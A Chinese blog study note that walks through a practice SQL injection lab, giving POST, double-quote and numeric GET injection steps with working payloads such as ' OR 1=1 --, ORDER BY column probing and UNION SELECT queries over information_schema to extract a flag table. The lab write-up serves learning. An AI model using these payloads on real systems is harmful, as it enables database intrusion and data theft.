学习笔记:入门SQL注入靶场(2)
📅 2026/7/15 20:11:11
👁️ 次浏览
sql注入-POST类型注入首先我们需要简单了解一下POST类型和GET类型的区别对比维度GET型注入POST型注入数据位置贴在URL地址栏后面问号后面藏在网页内部数据包的肚子里肉眼可见能地址栏全看得见不能普通用户看不到浏览器缓存会被浏览器记录历史容易留痕不会被记录在地址栏历史里传播方式可以直接复制链接发给别人诱导点击必须构造一个伪造的表单或页面来提交长度限制一般有长度限制浏览器和服务器限制理论上可以传很大传文件、长文章在构造语句上也有些许差别区别维度GET型注入地址栏POST型注入表单体特殊字符编码地址栏不支持回车、空格和#井号。注入时必须把空格变成或%20#要编码成%23否则浏览器会截断后面的内容。直接写原始字符即可。比如 OR 11 --直接填在表单框里不用考虑编码转换。语句长度限制受限严重。浏览器和服务器对URL长度有限制IE约2083字节。如果你想用UNION SELECT拖取大量数据长语句可能在地址栏塞不下。几乎无限制。适合提交超长的注入语句或者把完整的一段复杂脚本塞在备注框里。后台拼接场景通常对应WHERE条件查询条件。比如?id1注入时主要围绕闭合单引号和括号来构造。通常对应INSERT或UPDATE写入数据。比如注册用户名、修改密码。这时候注入不仅要闭合引号还得考虑字段数量和闭合整条SQL语句的结尾构造起来稍微复杂一点。这里我们简单举两个例子GET型写法地址栏输入http://test.com/page?id1%27%20OR%20%271%27%271实际上等同于1 OR 11但空格必须换成%20单引号要编码POST型写法在登录框用户名处输入直接填admin OR 11 --虽然sqlmap等自动化工具工具会自动处理这些格式你感觉不到区别但是有些时候这类自动化工具会被禁用所以你最好掌握手工注入。回到正题这题既然是POST注入且是查询用户名所以我们直接构建admin OR 11 --好的数据库被爆了出来然后从这个查询结果我们可以得知有ID姓名邮箱....共7个库接下来我们使用一下联合语句select * from name where UNION SELECT 1,user(),database(),version(),5,6,7 --其中user()是为了获取当前数据库的登录账号database()返回当前数据库version()获取数据库的版本号请不要怀疑10.11.11-MariaDB就是它的完整版本号功能上等同于 MySQL 5.7 / 8.0 系列以及邮箱的数据库名就是sql_injection_lab既然已经知道数据库的名称了接下来就是查询一下这个库的里面的表的名字构建语句select * from name where UNION SELECT 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema sql_injection_lab -- 然后我们发现姓名里有个叫flag的table所以我们在继续查下这列select * from name where 1 UNION SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name flag -- 这里可以看到是flag表里面有个flag列接下来我们查下flag的值然后拿下select * from name where 1 UNION SELECT 1,flag,3,4,5,6,7 FROM flag-- sql注入-POST类型注入-2依旧是POST型注入所以我们还是先使用admin OR 11 --看看怎么个事结果是什么也没查询到那我们换双引号试试这次有报错信息证明是双引号闭合接下来我们查询一下列数admin order by 7#admin order by 8#报错证明只有7列接下来使用union select 去寻找注入回显点admin union select 1,2,3,4,5,6,7#然后我们爆一下库名admin union select 1,database(),3,4,5,6,7#然后是表名admin union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schemasql_injection_lab#有个名为flag的表名所以我们继续爆列名admin union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_nameflag#最后获取获取 flag 表 flag 字段内容admin union select 1,flag,3,4,5,6,7 from flag#报错注入-sql注入-数字型这关是GET型注入且还额外提供了查询语句然后我们直接构建语句1 and 11 和 1 and 12好上述两个语句返回的结果不一致证明存在SQL数字型注入然后我们用order by 判断列数我们先构建语句 1 order by 4,没报错然后我们尝试8报错了于是我们依次尝试5到7发现到6的时候报错了所以此处有5列然后我们使用database()函数来查询数据库名1 union select 1,2,database(),4,5得到数据库名后我们爆表名1 union select 1,2,group_concat(schema_name),4,5 from information_schema.schemata注这一步是利用information_schema.schemata表获取所有数据库名其中group_concat是为了将多个数据库名称合并显示方便查看。然后我们找一下包含flag的数据库1 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schemasql_injection_lab --好的这个表刚好有flag所以我们继续爆flag的列名1 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schemasql_injection_lab and table_name flag -- -接下来我们直接查询flag的值1 union select 1,2,flag,4,5 from sql_injection_lab.flag
1. ADC基础概念:从模拟到数字的桥梁第一次接触ADC时,我盯着开发板上的电位器旋钮发呆——转动它就能改变电压值,但单片机怎么知道现在旋钮转到什么位置了呢?这就是ADC(模数转换器)要解决的问题。简单来说&a…
📅 2026/7/15 20:11:11
1. ArcGIS Pro 是什么?ArcGIS Pro 是 Esri 公司推出的新一代桌面 GIS 软件,它采用了现代化的 64 位架构,相比传统的 ArcMap 在性能和功能上都有显著提升。简单来说,它就像是一个超级地图制作和分析工具,不仅能处理普通…
📅 2026/7/15 20:11:11
1. 软件架构设计核心考点解析1.1 质量属性场景建模方法质量属性建模是软件架构设计的核心技能,考试中几乎每年都会出现。最典型的考题是要求用"刺激-响应"图对可用性、性能等质量属性进行建模。我当年第一次遇到这种题时完全摸不着头脑,后来发…
📅 2026/7/15 20:11:11
更多请点击:
https://intelliparadigm.com
第一章:Cursor MVP不是“玩具”——看头部AI创业公司如何用它通过YC初筛:3份真实评审反馈重构清单 在2024年YC冬季批次中,三家AI原生初创公司——Lumina(多模态文档理解&…
📅 2026/7/15 21:03:35
日常批量压缩文件,需要加密时,多数人每次都要手动输入解压密码,但是重复操作,浪费时间不说,还容易输错密码,影响工作。其实,如果你一直在用WinRaR压缩文件,可以使用它的“自动加密功…
📅 2026/7/15 21:03:35
1. 从浏览器输入网址到页面加载,数据包经历了什么?想象一下你在浏览器输入"www.baidu.com"后敲下回车,这个简单的动作背后隐藏着一场跨越千山万水的数据旅行。让我们跟随一个HTTP请求数据包,看看它从诞生到消亡的完整生…
📅 2026/7/15 21:03:35
1. 项目概述:为什么我们需要DS90UB948-Q1?在今天的汽车座舱里,从中央大屏到数字仪表盘,再到后排娱乐屏,高清视频信号的传输已经成了标配。但你可能不知道,把一块2K分辨率的屏幕点亮,背后需要一套…
📅 2026/7/15 21:03:35
更多请点击:
https://kaifayun.com
第一章:ChatGPT项目总结报告 本项目基于OpenAI官方API构建了企业级对话服务中间层,聚焦于会话状态管理、敏感内容过滤与上下文压缩优化三大核心能力。系统采用Python 3.11开发,通过异步HTTP客户…
📅 2026/7/15 21:03:35
更多请点击:
https://codechina.net
第一章:ChatGPT目标拆解的认知重构与底层逻辑 传统AI应用常将“生成高质量回答”视为单一黑箱目标,而ChatGPT的工程实践揭示:真正可落地的智能系统必须完成目标的结构性拆解——从用户意图识别…
📅 2026/7/15 21:02:35
1. COM线程模型基础与CoInitializeEx核心作用在Windows平台开发中,组件对象模型(COM)的线程处理机制一直是开发者必须掌握的底层知识。作为COM初始化的门户函数,CoInitializeEx不仅决定了对象在何种线程环境下运行,更影响着整个组件的并发性能…
📅 2026/7/15 0:00:17
1. 为什么M芯片Mac用户需要降级到Monterey? 去年刚拿到M2芯片的MacBook Pro时,我第一时间升级到了Ventura系统。结果第三天就遇到了微信闪退、Final Cut Pro渲染卡顿的问题。后来在开发者论坛发现,不少专业软件对Ventura的适配都存在问题。这…
📅 2026/7/15 0:00:17
1. 背景与核心概念在AI大模型快速发展的今天,许多开发者和研究者都面临一个现实问题:如何在有限的硬件预算下实现高效的本地大模型部署。特别是对于个人开发者和小型团队来说,购买最新的高端显卡成本高昂,而利用现有的或二手硬件资…
📅 2026/7/15 0:00:17
豆包openclaw最近圈子里都在聊豆包openclaw,我也没忍住,掏腰包入手了一套。说实话,刚拿到手的时候,心里是打鼓的。毕竟市面上类似的智能硬件太多了,有的吹得天花乱坠,用起来却是一堆bug。为了不让大家的钱打水漂,我连续用了半个月。从开箱到日常高频使用,甚至故意测试它…
📅 2026/7/14 6:35:02
SQLyog 13.3.1 社区版在Windows 10/11上的完整安装与连接指南 对于刚接触MySQL数据库管理的开发者和学生来说,选择一个直观易用的图形化管理工具至关重要。SQLyog作为一款轻量级但功能强大的MySQL GUI工具,能够显著提升数据库操作的效率和体验。本文将详…
📅 2026/7/15 19:03:10
SPEC CPU 2006 跨平台基准测试深度实战:ARM/X86/MIPS 架构配置优化与结果分析方法论在当今多元化的计算架构时代,如何客观评估不同处理器平台的真实性能成为系统工程师和性能优化专家的核心挑战。SPEC CPU 2006 作为业界公认的计算密集型基准测试套件&am…
📅 2026/7/15 14:09:20
目录
第一步:选对模板,省心一半
第二步:打开扫码点餐功能
开启功能按钮
桌台管理与桌码生成
第三步:个性化设计,打造品牌感
调整点餐页面
设置点餐规则 你还在让顾客站着排队点餐吗?2025年ÿ…
📅 2026/7/14 15:11:56
在业务中快速构建一个能理解私有文档、准确回答专业问题的智能助手,是很多开发团队面临的共同挑战。传统方案往往需要从零开始搭建复杂的 RAG(检索增强生成)系统,涉及文档解析、向量化、检索、大模型调用等多个环节,整…
📅 2026/7/15 2:24:18
FAE放射组学分析工具:医学影像特征探索的完整解决方案 【免费下载链接】FAE FeAture Explorer 项目地址: https://gitcode.com/gh_mirrors/fae/FAE
你是否曾经面对海量医学影像数据感到无从下手?想要从CT、MRI等影像中提取有价值的定量特征&#…
📅 2026/7/14 15:11:56